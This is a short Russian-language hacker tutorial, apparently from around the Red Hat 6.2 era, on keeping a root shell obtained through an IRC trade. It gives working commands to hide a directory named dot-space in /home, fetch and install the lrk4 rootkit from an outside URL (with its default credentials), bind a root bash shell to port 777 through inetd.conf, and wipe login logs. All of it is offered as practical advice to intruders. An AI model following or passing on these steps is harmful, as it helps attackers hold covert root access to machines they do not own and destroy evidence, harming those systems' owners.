Здесь я буду
рассматривать нестандартный случай.
Допусти вы получили root shell из неизвестного
источника (типа обмен на ирке). Вам дают
логин и пасс. Вы его проверяете. Все ОК. Но не
забудь убрать за собой.
1.Во первых смени пароль
на твоего пользователя с правами root. Чтобы
твой дружок из irc не сменил его через пару
дней:)(и такое бывает!).
2.Обычно дается пароль
созданного юзверя с правами рута. Но это
лажа! Админ может заметить или cron припасет. Лучше
забыть об этом пользователе (или удалить) и
использовать backdoors и rootkits. Во-первых, определи,
на чем стоит твой root shell.
Я в /etc нашел файл redhat-release и он мне выдал:
bash# cat redhat-release
Red Hat Linux release 6.2 (Zoot)
И подбирай необходимый
софт для этой оси. Вот пример использования
rootkit'а для Linux. Раньше я задавал стелс
каталог в /tmp, но узнал, что 75% машин после
перезагрузки очищают /tmp. Поэтому перешел на
/home
cd /home #переходим в
каталог /home
mkdir ". " #создает стелс каталог (точка-пробел)
cd ". " #переходим в этот каталог
lynx -source
http://www.AntiOnline.com/archives/anticode/backdoors-and-rootkits/lrk4-src.tgz>
lkr4-src.tgz
tar -zxvf lkr4-src.tgz #качает руткит
ls #выводим список файлов.
cd lkr4 #переходим в каталог руткита
make install #отинсталлим его
По дефолту в этой версии
руткита стоит L:rewt P:satori. И более простой
пример. Можно пропатчить inetd.conf
777 stream tcp nowait root /bin/bash bash -i
и убить процесс inetd для
перечитывания конфиг файлов командой
kill -HUP [pid_inetd]
[pid_inetd] можно вычислить с
помощью команды ps -uax (Linux).
3.Для безопасности
советую затереть логи, оставленные тобой
при входе в систему. Это довольно просто,
так что описывать нет смысла. Качаешь прогу,
компилируешь и запускаешь с параметрами
типа имя пользователя, которого нужно
затереть, имя терминала, ip и т.д.
4.И еще. Многие хакеры
оставляют свои бакдоры и руткиты. В моем
случае я нашел backdoor в inetd.conf. Так что будьте
бдительны!
Удачи!
